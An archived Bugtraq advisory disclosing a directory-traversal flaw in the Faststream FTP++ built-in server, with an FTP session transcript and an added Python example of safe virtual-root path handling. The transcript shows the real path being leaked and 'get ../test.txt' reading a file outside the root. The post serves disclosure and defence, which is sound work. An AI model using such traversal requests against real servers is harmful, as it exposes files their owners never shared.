Bugtraq mailing list archives
Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability
From: se00020 () LION CC
Date: Sun, 4 Mar 2001 16:26:23 -0000
Faststream FTP built in server responds with the real path of directory instead of a virtual one. It is possible to get files outside of root.dir.

e:\crap was used as root directory

1. directory path

230 User anonymous logged in.
ftp> pwd
257 "/E:/crap/" is current directory.

2. getting files from outside of root

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 438 Bytes empfangen in 0,00Sekunden 438000,00KB/s
ftp> get ../test.txt
200 Port command successful.
150 Opening data connection for ../test.txt.
226 File sent ok
FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s

Solution: no quick fix possible. Use with care.

Author has been contacted on 04.Mar.2001

se00020 () fhs-hagenberg ac at
se00020 () lion cc
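
Both observations in the report above (PWD answering with the real path, and "get ../test.txt" leaving the root) come down to how a server maps client-supplied paths onto its root directory. The following is an added example, not part of the original post and not Faststream's code: one way to do that mapping in Python, where the class VirtualRoot and its method names are hypothetical and e:\crap is the root directory named in the post.

```python
import ntpath  # Windows path rules, usable on any OS for this demonstration


class VirtualRoot:
    """Maps FTP client paths onto one real directory (hypothetical helper)."""

    def __init__(self, real_root):
        self.real_root = ntpath.normpath(real_root)
        self.cwd = []  # virtual working directory, as path components

    def _components(self, client_path):
        # Windows accepts both separators, so treat them alike.
        absolute = client_path[:1] in ("/", "\\")
        stack = [] if absolute else list(self.cwd)
        for part in client_path.replace("\\", "/").split("/"):
            if part in ("", "."):
                continue
            if part == "..":
                if not stack:
                    raise PermissionError("path escapes virtual root")
                stack.pop()
            elif ":" in part:
                raise PermissionError("drive letters are not allowed")
            else:
                stack.append(part)
        return stack

    def resolve(self, client_path):
        """Real path for RETR/LIST; raises PermissionError on escape."""
        stack = self._components(client_path)
        real = ntpath.normpath(ntpath.join(self.real_root, *stack))
        # Second check on the final string, independent of the parser above.
        root = ntpath.normcase(self.real_root)
        prefix = root.rstrip("\\") + "\\"
        candidate = ntpath.normcase(real)
        if candidate != root and not candidate.startswith(prefix):
            raise PermissionError("path escapes virtual root")
        return real

    def change_dir(self, client_path):
        self.cwd = self._components(client_path)

    def pwd_reply(self):
        """257 reply built from the virtual path only, never the real one."""
        return '257 "/%s" is current directory.' % "/".join(self.cwd)
```

String checks like these do not see junctions or symbolic links inside the root; a server that permits them also has to compare fully resolved paths.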